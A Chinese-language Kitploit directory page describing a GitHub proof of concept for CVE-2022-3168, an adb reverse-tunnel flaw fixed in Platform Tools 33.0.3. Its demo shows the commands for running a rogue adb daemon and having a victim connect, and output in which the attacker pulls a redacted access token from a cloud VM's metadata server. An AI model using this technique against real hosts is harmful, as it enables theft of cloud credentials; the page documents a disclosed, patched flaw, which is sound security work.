Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-3168-adb-unexpected-reverse-forwards — 用于利用adb漏洞的概念验证代码,该漏洞允许在主机上打开网络连接到任意目标。 | Kitploit
工具/GitHubGitHub/irsl/cve-2022-3168-adb-unexpected-reverse-forwards
Android安全漏洞分析漏洞利用渗透测试移动安全红队
GitHubirsl/cve-2022-3168-adb-unexpected-reverse-forwards

CVE-2022-3168-adb-unexpected-reverse-forwards

用于利用adb漏洞的概念验证代码,该漏洞允许在主机上打开网络连接到任意目标。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
31484年前尚未审核

Android Debug Bridge (adb) 的反向隧道功能存在漏洞,允许恶意的 adb 守护进程在主机上打开到任意主机/端口和 Unix 域套接字的连接。

攻击者窗口(运行恶意守护进程):

root@kitploit:~
$ ./adb_rogue_daemon.py

受害者窗口(本例中为 GCE VM):

root@kitploit:~
$ adb connect serverip:5556
connected to 8.tcp.ngrok.io:19076

攻击者窗口:

root@kitploit:~
...
Wooho, we got response for our rouge request!
b'HTTP/1.0 200 OK\r\nMetadata-Flavor: Google\r\nContent-Type: application/json\r\nDate: Thu, 04 Nov 2021 22:31:21 GMT\r\nServer: Metadata Server for VM\r\nConnection: Close\r\nContent-Length: 1049\r\nX-XSS-Protection: 0\r\nX-Frame-Options: SAMEORIGIN\r\n\r\n{"access_token":"ya29.c.KpgBFghLV[redacted].....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................'
<<< b'...................................................................................................................................................................................................................................................","expires_in":2394,"token_type":"Bearer"}CLSE\x08\x00\x00\x00\xd2\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xbc\xb3\xac\xba'
b'...................................................................................................................................................................................................................................................","expires_in":2394,"token_type":"Bearer"}CLSE\x08\x00\x00\x00\xd2\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xbc\xb3\xac\xba'
('....', (774778414, 774778414, 774778414, 774778414, 774778414), b'...........................................................................................................................................................................................................................","expires_in":2394,"token_type":"Bearer"}CLSE\x08\x00\x00\x00\xd2\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xbc\xb3\xac\xba')

该漏洞已在 Platform Tools 33.0.3 中修复。

下载工具